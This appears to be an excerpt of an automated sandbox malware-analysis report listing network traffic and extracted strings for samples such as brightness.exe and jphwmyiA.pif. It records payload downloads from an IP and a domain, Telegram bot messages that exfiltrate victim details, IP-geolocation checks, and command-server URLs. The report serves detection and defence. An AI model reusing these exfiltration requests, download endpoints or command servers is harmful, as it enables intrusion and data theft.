                  Source: unknownTCP traffic detected without corresponding DNS query: 147.124.216.113
                  Source: unknownTCP traffic detected without corresponding DNS query: 147.124.216.113
                  Source: unknownTCP traffic detected without corresponding DNS query: 147.124.216.113
                  Source: unknownTCP traffic detected without corresponding DNS query: 147.124.216.113
                  Source: unknownTCP traffic detected without corresponding DNS query: 147.124.216.113
                  Source: unknownTCP traffic detected without corresponding DNS query: 147.124.216.113
                  Source: unknownTCP traffic detected without corresponding DNS query: 147.124.216.113
                  Source: unknownTCP traffic detected without corresponding DNS query: 147.124.216.113
                  Source: unknownTCP traffic detected without corresponding DNS query: 147.124.216.113
                  Source: unknownTCP traffic detected without corresponding DNS query: 147.124.216.113
                  Source: unknownTCP traffic detected without corresponding DNS query: 147.124.216.113
                  Source: unknownTCP traffic detected without corresponding DNS query: 147.124.216.113
                  Source: unknownTCP traffic detected without corresponding DNS query: 147.124.216.113
                  Source: unknownTCP traffic detected without corresponding DNS query: 147.124.216.113
                  Source: unknownTCP traffic detected without corresponding DNS query: 147.124.216.113
                  Source: unknownTCP traffic detected without corresponding DNS query: 147.124.216.113
                  Source: unknownTCP traffic detected without corresponding DNS query: 147.124.216.113
                  Source: unknownTCP traffic detected without corresponding DNS query: 147.124.216.113
                  Source: unknownTCP traffic detected without corresponding DNS query: 147.124.216.113
                  Source: unknownTCP traffic detected without corresponding DNS query: 147.124.216.113
                  Source: unknownTCP traffic detected without corresponding DNS query: 147.124.216.113
                  Source: unknownTCP traffic detected without corresponding DNS query: 147.124.216.113
                  Source: unknownTCP traffic detected without corresponding DNS query: 147.124.216.113
                  Source: unknownTCP traffic detected without corresponding DNS query: 147.124.216.113
                  Source: unknownTCP traffic detected without corresponding DNS query: 147.124.216.113
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:675052%0D%0ADate%20and%20Time:%2006/01/2025%20/%2013:18:56%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20675052%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:675052%0D%0ADate%20and%20Time:%2006/01/2025%20/%2014:18:23%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20675052%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:675052%0D%0ADate%20and%20Time:%2006/01/2025%20/%2014:38:51%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20675052%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /image.exe HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Language: en-chUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: 147.124.216.113
                  Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficDNS traffic detected: DNS query: amazonenviro.com
                  Source: global trafficDNS traffic detected: DNS query: checkip.dyndns.org
                  Source: global trafficDNS traffic detected: DNS query: reallyfreegeoip.org
                  Source: global trafficDNS traffic detected: DNS query: api.telegram.org
                  Source: global trafficDNS traffic detected: DNS query: mail.techniqueqatar.com
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Mon, 06 Jan 2025 06:54:25 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Mon, 06 Jan 2025 06:54:36 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Mon, 06 Jan 2025 06:54:44 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                  Source: jphwmyiA.pif, 0000000A.00000002.3759975786.00000000211F1000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 0000000F.00000002.3758305974.000000001C285000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000013.00000002.3759044555.00000000228EC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.38.247.67:8081/_send_.php?L
                  Source: jphwmyiA.pif, 0000000A.00000002.3757907587.0000000020D49000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 0000000A.00000003.2131092317.000000001F2F1000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 0000000A.00000002.3762971670.0000000023660000.00000004.08000000.00040000.00000000.sdmp, jphwmyiA.pif, 0000000A.00000002.3762852858.0000000023600000.00000004.08000000.00040000.00000000.sdmp, jphwmyiA.pif, 0000000F.00000003.2260610637.000000001A4A2000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 0000000F.00000002.3763827438.000000001E710000.00000004.08000000.00040000.00000000.sdmp, jphwmyiA.pif, 0000000F.00000002.3757413723.000000001BE09000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 0000000F.00000002.3764652737.000000001ED60000.00000004.08000000.00040000.00000000.sdmp, jphwmyiA.pif, 00000013.00000003.2330601115.00000000207AE000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 00000013.00000002.3758852634.0000000022770000.00000004.08000000.00040000.00000000.sdmp, jphwmyiA.pif, 00000013.00000002.3765669211.0000000024C70000.00000004.08000000.00040000.00000000.sdmp, jphwmyiA.pif, 00000013.00000002.3758412970.0000000022509000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded
                  Source: jphwmyiA.pif, 0000000A.00000002.3757907587.0000000020D49000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 0000000A.00000003.2131092317.000000001F2F1000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 0000000A.00000002.3762971670.0000000023660000.00000004.08000000.00040000.00000000.sdmp, jphwmyiA.pif, 0000000A.00000002.3762852858.0000000023600000.00000004.08000000.00040000.00000000.sdmp, jphwmyiA.pif, 0000000A.00000002.3759975786.0000000021121000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 0000000F.00000003.2260610637.000000001A4A2000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 0000000F.00000002.3758305974.000000001C1D1000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 0000000F.00000002.3763827438.000000001E710000.00000004.08000000.00040000.00000000.sdmp, jphwmyiA.pif, 0000000F.00000002.3757413723.000000001BE09000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 0000000F.00000002.3764652737.000000001ED60000.00000004.08000000.00040000.00000000.sdmp, jphwmyiA.pif, 00000013.00000003.2330601115.00000000207AE000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 00000013.00000002.3758852634.0000000022770000.00000004.08000000.00040000.00000000.sdmp, jphwmyiA.pif, 00000013.00000002.3765669211.0000000024C70000.00000004.08000000.00040000.00000000.sdmp, jphwmyiA.pif, 00000013.00000002.3758412970.0000000022509000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 00000013.00000002.3759044555.00000000227E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://aborters.duckdns.org:8081
                  Source: brightness.exe, 00000007.00000002.2129746891.00000000006AE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://amazonenviro.com/
                  Source: brightness.exe, 00000007.00000002.2129746891.00000000006F5000.00000004.00000020.00020000.00000000.sdmp, brightness.exe, 00000007.00000002.2158197461.000000002059D000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000007.00000002.2129746891.00000000006AE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://amazonenviro.com/245_Aiymwhpjxsg
                  Source: brightness.exe, 00000007.00000002.2129746891.000000000071D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://amazonenviro.com:80/245_Aiymwhpjxsg
                  Source: jphwmyiA.pif, 0000000A.00000002.3757907587.0000000020D49000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 0000000A.00000003.2131092317.000000001F2F1000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 0000000A.00000002.3762971670.0000000023660000.00000004.08000000.00040000.00000000.sdmp, jphwmyiA.pif, 0000000A.00000002.3762852858.0000000023600000.00000004.08000000.00040000.00000000.sdmp, jphwmyiA.pif, 0000000A.00000002.3759975786.0000000021121000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 0000000F.00000003.2260610637.000000001A4A2000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 0000000F.00000002.3758305974.000000001C1D1000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 0000000F.00000002.3763827438.000000001E710000.00000004.08000000.00040000.00000000.sdmp, jphwmyiA.pif, 0000000F.00000002.3757413723.000000001BE09000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 0000000F.00000002.3764652737.000000001ED60000.00000004.08000000.00040000.00000000.sdmp, jphwmyiA.pif, 00000013.00000003.2330601115.00000000207AE000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 00000013.00000002.3758852634.0000000022770000.00000004.08000000.00040000.00000000.sdmp, jphwmyiA.pif, 00000013.00000002.3765669211.0000000024C70000.00000004.08000000.00040000.00000000.sdmp, jphwmyiA.pif, 00000013.00000002.3758412970.0000000022509000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 00000013.00000002.3759044555.00000000227E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anotherarmy.dns.army:8081
                  Source: brightness.exe, 00000007.00000003.2123881485.000000007F3E0000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000007.00000002.2163696494.000000007F0CF000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000007.00000002.2158197461.0000000020490000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000007.00000002.2160861366.00000000213AA000.00000004.00000020.00020000.00000000.sdmp, Aiymwhpj.PIF, 0000000C.00000003.2246113616.0000000000872000.00000004.00000020.00020000.00000000.sdmp, Aiymwhpj.PIF, 0000000C.00000002.2285949011.0000000021030000.00000004.00000020.00020000.00000000.sdmp, Aiymwhpj.PIF, 0000000C.00000002.2278044867.0000000020664000.00000004.00001000.00020000.00000000.sdmp, Aiymwhpj.PIF, 0000000C.00000002.2278044867.0000000020590000.00000004.00001000.00020000.00000000.sdmp, Aiymwhpj.PIF, 00000010.00000003.2324913590.00000000007F2000.00000004.00000020.00020000.00000000.sdmp, Aiymwhpj.PIF, 00000010.00000003.2324913590.000000000084E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
                  Source: brightness.exe, 00000007.00000003.2123881485.000000007F3E0000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000007.00000002.2163696494.000000007F0CF000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000007.00000002.2158197461.0000000020490000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000007.00000002.2160861366.00000000213AA000.00000004.00000020.00020000.00000000.sdmp, Aiymwhpj.PIF, 0000000C.00000003.2246113616.0000000000872000.00000004.00000020.00020000.00000000.sdmp, Aiymwhpj.PIF, 0000000C.00000002.2285949011.0000000021030000.00000004.00000020.00020000.00000000.sdmp, Aiymwhpj.PIF, 0000000C.00000002.2278044867.0000000020664000.00000004.00001000.00020000.00000000.sdmp, Aiymwhpj.PIF, 0000000C.00000002.2278044867.0000000020590000.00000004.00001000.00020000.00000000.sdmp, Aiymwhpj.PIF, 00000010.00000003.2324913590.00000000007F2000.00000004.00000020.00020000.00000000.sdmp, Aiymwhpj.PIF, 00000010.00000003.2324913590.000000000084E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
                  Source: brightness.exe, 00000007.00000003.2123881485.000000007F3E0000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000007.00000002.2163696494.000000007F0CF000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000007.00000002.2158197461.0000000020490000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000007.00000002.2160861366.00000000213AA000.00000004.00000020.00020000.00000000.sdmp, Aiymwhpj.PIF, 0000000C.00000003.2246113616.0000000000872000.00000004.00000020.00020000.00000000.sdmp, Aiymwhpj.PIF, 0000000C.00000002.2285949011.0000000021030000.00000004.00000020.00020000.00000000.sdmp, Aiymwhpj.PIF, 0000000C.00000002.2278044867.0000000020664000.00000004.00001000.00020000.00000000.sdmp, Aiymwhpj.PIF, 0000000C.00000002.2278044867.0000000020590000.00000004.00001000.00020000.00000000.sdmp, Aiymwhpj.PIF, 00000010.00000003.2324913590.00000000007F2000.00000004.00000020.00020000.00000000.sdmp, Aiymwhpj.PIF, 00000010.00000003.2324913590.000000000084E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
                  Source: jphwmyiA.pif, 00000013.00000002.3759044555.00000000227E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org
                  Source: jphwmyiA.pif, 0000000A.00000002.3759975786.0000000021121000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 0000000F.00000002.3758305974.000000001C1D1000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000013.00000002.3759044555.00000000227E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/
                  Source: jphwmyiA.pif, 0000000A.00000002.3757907587.0000000020D49000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 0000000A.00000003.2131092317.000000001F2F1000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 0000000A.00000002.3762971670.0000000023660000.00000004.08000000.00040000.00000000.sdmp, jphwmyiA.pif, 0000000A.00000002.3762852858.0000000023600000.00000004.08000000.00040000.00000000.sdmp, jphwmyiA.pif, 0000000F.00000003.2260610637.000000001A4A2000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 0000000F.00000002.3763827438.000000001E710000.00000004.08000000.00040000.00000000.sdmp, jphwmyiA.pif, 0000000F.00000002.3757413723.000000001BE09000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 0000000F.00000002.3764652737.000000001ED60000.00000004.08000000.00040000.00000000.sdmp, jphwmyiA.pif, 00000013.00000003.2330601115.00000000207AE000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 00000013.00000002.3758852634.0000000022770000.00000004.08000000.00040000.00000000.sdmp, jphwmyiA.pif, 00000013.00000002.3765669211.0000000024C70000.00000004.08000000.00040000.00000000.sdmp, jphwmyiA.pif, 00000013.00000002.3758412970.0000000022509000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/q
                  Source: brightness.exe, 00000007.00000003.2123881485.000000007F3E0000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000007.00000002.2163696494.000000007F0CF000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000007.00000002.2158197461.0000000020490000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000007.00000002.2160861366.00000000213AA000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 0000000A.00000002.3763255345.00000000237D4000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 0000000A.00000002.3763255345.0000000023850000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 0000000A.00000003.2469665166.0000000023860000.00000004.00000020.00020000.00000000.sdmp, Aiymwhpj.PIF, 0000000C.00000003.2246113616.0000000000872000.00000004.00000020.00020000.00000000.sdmp, Aiymwhpj.PIF, 0000000C.00000002.2285949011.0000000021030000.00000004.00000020.00020000.00000000.sdmp, Aiymwhpj.PIF, 0000000C.00000002.2278044867.0000000020664000.00000004.00001000.00020000.00000000.sdmp, Aiymwhpj.PIF, 0000000C.00000002.2278044867.0000000020590000.00000004.00001000.00020000.00000000.sdmp, jphwmyiA.pif, 0000000F.00000002.3765263149.000000001F260000.00000004.00000020.00020000.00000000.sdmp, Aiymwhpj.PIF, 00000010.00000003.2324913590.00000000007F2000.00000004.00000020.00020000.00000000.sdmp, Aiymwhpj.PIF, 00000010.00000003.2324913590.000000000084E000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 00000013.00000002.3766205555.000000002562B000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 00000013.00000003.2643241704.0000000025639000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 00000013.00000002.3766205555.000000002569C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
                  Source: jphwmyiA.pif, 0000000A.00000002.3763255345.0000000023850000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 0000000A.00000003.2469665166.0000000023860000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 0000000F.00000002.3757186575.000000001A506000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 0000000F.00000002.3765263149.000000001F260000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 00000013.00000002.3766205555.000000002562B000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 00000013.00000003.2643241704.0000000025639000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
                  Source: brightness.exe, 00000007.00000003.2123550803.000000007F3EF000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000007.00000002.2161107303.0000000021426000.00000004.00000020.00020000.00000000.sdmp, brightness.exe, 00000007.00000002.2161329052.00000000214AA000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000007.00000003.2123881485.000000007F3E0000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000007.00000002.2163281507.0000000021700000.00000004.00000020.00020000.00000000.sdmp, brightness.exe, 00000007.00000002.2158197461.0000000020490000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000007.00000003.2128046542.000000007F3AA000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000007.00000002.2162496281.00000000215F2000.00000004.00001000.00020000.00000000.sdmp, Aiymwhpj.PIF, 0000000C.00000002.2278044867.0000000020590000.00000004.00001000.00020000.00000000.sdmp, jphwmyiA.pif.7.drString found in binary or memory: http://crl.comodoca.com/COMODOCodeSigningCA2.crl0r
